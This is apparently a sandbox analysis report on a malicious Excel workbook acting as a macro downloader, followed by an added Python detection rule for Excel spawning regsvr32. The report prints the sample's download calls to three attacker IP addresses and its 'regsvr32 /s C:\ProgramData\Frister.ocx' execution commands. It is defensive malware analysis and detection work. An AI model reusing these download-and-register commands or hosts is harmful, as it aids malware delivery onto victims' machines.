Summary | ZeroBOX

SNC-612086596-Apr-6.xlsb

Tags: Malicious Library; Excel Binary Workbook file format (xlsb)
Category FILE
Machine s1_win7_x6401
Started April 7, 2022, 11:23 a.m.
Completed April 7, 2022, 11:25 a.m.
Size 1.2MB
Type Microsoft Excel 2007+
MD5 4625181b70514f226dcddbb7e9ff87fd
SHA256 b7cdf96a1312ef4996f18b710215c9a00d40219867d80095b635ce4dbd2fdb23
CRC32 0D321736
ssdeep 24576:GF+BnmJkeGC2PbA/HMoNYIPeuVe2HHCkm6CyIwl6hafINeWHWR72vF+BnmJkeGC9:6ymaeGC9YSeQHCkXC/wl6LcW2929ymaW
Yara
  • xlsb - Excel Binary Workbook file format detection
  • Malicious_Library_Zero - Malicious_Library

Name Response Post-Analysis Lookup
No domain names were resolved: every request in this run addresses its host by IP literal, so no DNS lookup was needed.
IP Address Status Action
104.225.129.111 Active Moloch
212.46.38.179 Active Moloch
91.234.254.131 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features Connection to IP address
suspicious_request GET http://212.46.38.179/7790983516.dat
suspicious_request GET http://91.234.254.131/7790983516.dat
request GET http://212.46.38.179/7790983516.dat
request GET http://91.234.254.131/7790983516.dat
Memory protection and allocation calls by process 2784 requesting PAGE_EXECUTE_READWRITE (RWX) pages. RWX memory is a common sign of code being unpacked or staged for execution in place, but it also appears in legitimate JIT and loader activity, so weigh it together with the process chain and network activity below.
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcf1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x750c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fb81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fb71000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07350000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07350000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08680000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\Frister.ocx
file C:\ProgramData\Frister1.ocx
file C:\ProgramData\Frister2.ocx
Time & API Arguments Status Return Repeated
The hidden, delete-on-close ~$SNC-612086596-Apr-6.xlsb entries below are Excel's normal owner/lock file for the open workbook, created in the directory the document was opened from. They trip the hidden-file heuristic but are not a dropped payload; the files of interest are the Frister*.ocx paths under C:\ProgramData.

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a4
filepath: C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000040c
filepath: C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000444
filepath: C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 /s C:\ProgramData\Frister.ocx
cmdline regsvr32 /s C:\ProgramData\Frister2.ocx
cmdline regsvr32 /s C:\ProgramData\Frister1.ocx
Engine Detection
Sangfor Malware.Generic-XLM.Save.ma35
Cyren XF/SneakyBin.E.gen!Eldorado
Kaspersky HEUR:Trojan.MSOffice.Generic
Tencent Trojan.MsOffice.Macro40.11003135
McAfee-GW-Edition X97M/Downloader.nf
Ikarus Trojan-Downloader.XLM.Agent
GData Macro.Trojan-Downloader.Agent.BDH
ZoneAlarm HEUR:Trojan.MSOffice.Generic
Fortinet MSExcel/Agent.IF!tr.dldr
host 104.225.129.111
host 212.46.38.179
host 91.234.254.131
Time & API Arguments Status Return Repeated
All three URLDownloadToFileW calls failed: the return values are HRESULTs with the severity bit set (0x800C0005 INET_E_RESOURCE_NOT_FOUND for the dead host, 0x800C0008 INET_E_DOWNLOAD_FAILURE for the other two). No second-stage payload was retrieved in this run, even though regsvr32 was still launched on each of the three target paths.

URLDownloadToFileW

url: http://104.225.129.111/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister.ocx
filepath: C:\ProgramData\Frister.ocx
2148270085 (0x800C0005, INET_E_RESOURCE_NOT_FOUND) 0

URLDownloadToFileW

url: http://212.46.38.179/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister1.ocx
filepath: C:\ProgramData\Frister1.ocx
2148270088 (0x800C0008, INET_E_DOWNLOAD_FAILURE) 0

URLDownloadToFileW

url: http://91.234.254.131/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister2.ocx
filepath: C:\ProgramData\Frister2.ocx
2148270088 (0x800C0008, INET_E_DOWNLOAD_FAILURE) 0
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister.ocx
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister2.ocx
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister1.ocx
dead_host 104.225.129.111:80
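The process chain recorded above (excel.exe spawning regsvr32 /s on a .ocx staged in C:\ProgramData) and the URLDownloadToFileW return values are the two parts of this report a detection engineer would want to check programmatically. The Python below is an added example, not part of the ZeroBOX report or its tooling. It runs a rule for the Office-to-regsvr32 chain over a handful of constructed Sysmon-style process-creation events (the event fields, the Explorer-launched vendor installer and the cmd.exe child are made up for illustration; only the two Frister command lines mirror this report) and decodes the HRESULTs that URLDownloadToFileW returned in this run.

```python
"""Added example (not from the ZeroBOX report): detect the Office -> regsvr32
chain over Sysmon-style process-creation events and decode the HRESULTs that
URLDownloadToFileW returned in this run."""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Office hosts whose spawning of regsvr32 is suspicious.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Directories an unprivileged user can write to; a downloader stages its
# payload here because Program Files and System32 need admin rights.
WRITABLE_DIR_RE = re.compile(
    r"^(?:[a-z]:\\programdata\\"
    r"|[a-z]:\\users\\[^\\]+\\appdata\\"
    r"|[a-z]:\\users\\public\\)",
    re.IGNORECASE,
)

# The module argument of regsvr32: a quoted or bare path ending in .ocx/.dll.
# regsvr32 itself does not care about the extension, so widen this if you see
# payloads with other suffixes.
MODULE_ARG_RE = re.compile(
    r'(?:^|\s)(?:"([^"]+\.(?:ocx|dll))"|(\S+\.(?:ocx|dll)))(?=\s|$)',
    re.IGNORECASE,
)

# HRESULTs seen in this report (URLMon INET_E_* codes).
INET_E_NAMES = {
    0x800C0005: "INET_E_RESOURCE_NOT_FOUND",
    0x800C0008: "INET_E_DOWNLOAD_FAILURE",
}


def regsvr32_module(cmdline: str) -> Optional[str]:
    """Return the module path passed to regsvr32, or None if there is none."""
    m = MODULE_ARG_RE.search(cmdline)
    if m is None:
        return None
    return m.group(1) or m.group(2)


def is_office_regsvr32_load(event: Dict[str, str]) -> bool:
    """True when an Office process launches regsvr32 on a module staged in a
    user-writable directory, the pattern this sample shows."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    if parent not in OFFICE_PARENTS or child != "regsvr32.exe":
        return False
    module = regsvr32_module(event.get("CommandLine", ""))
    return module is not None and WRITABLE_DIR_RE.match(module) is not None


def find_office_regsvr32_loads(events: List[Dict[str, str]]) -> List[str]:
    """Module paths from every event that matches the rule, in order."""
    return [regsvr32_module(e["CommandLine"]) for e in events
            if is_office_regsvr32_load(e)]


def download_outcome(ret: int) -> Tuple[bool, str]:
    """Classify a URLDownloadToFileW return value as (failed, name).

    The severity bit 0x80000000 separates failure HRESULTs from success ones
    (S_OK is 0), which is the check that matters before trusting a dropped file."""
    if ret & 0x80000000 == 0:
        return False, "S_OK" if ret == 0 else "0x%08X" % ret
    return True, INET_E_NAMES.get(ret, "0x%08X" % ret)


# Constructed Sysmon-style events; only the two Frister lines mirror the report.
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
REGSVR32 = r"C:\Windows\System32\regsvr32.exe"
SAMPLE_EVENTS = [
    {"ParentImage": EXCEL, "Image": REGSVR32,
     "CommandLine": r"regsvr32 /s C:\ProgramData\Frister.ocx"},
    {"ParentImage": EXCEL, "Image": REGSVR32,
     "CommandLine": r"regsvr32 /s C:\ProgramData\Frister2.ocx"},
    # benign (constructed): an installer run from Explorer registering a control
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": REGSVR32,
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\ctl.ocx"'},
    # Office child that is not regsvr32 (constructed)
    {"ParentImage": EXCEL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo hi"},
]

if __name__ == "__main__":
    for path in find_office_regsvr32_loads(SAMPLE_EVENTS):
        print("ALERT Office -> regsvr32 on staged module:", path)
    for rc in (2148270085, 2148270088, 2148270088):
        failed, name = download_outcome(rc)
        print("URLDownloadToFileW returned %d: %s (%s)"
              % (rc, name, "failed" if failed else "ok"))
```

The rule keys on the staging directory as well as the parent, so the constructed vendor installer registering a control from Program Files under explorer.exe is not flagged; drop the WRITABLE_DIR_RE check if you would rather alert on any Office-spawned regsvr32. Any return with the HRESULT severity bit set means the file was never downloaded, which is why this run produced no second-stage payload despite three attempts.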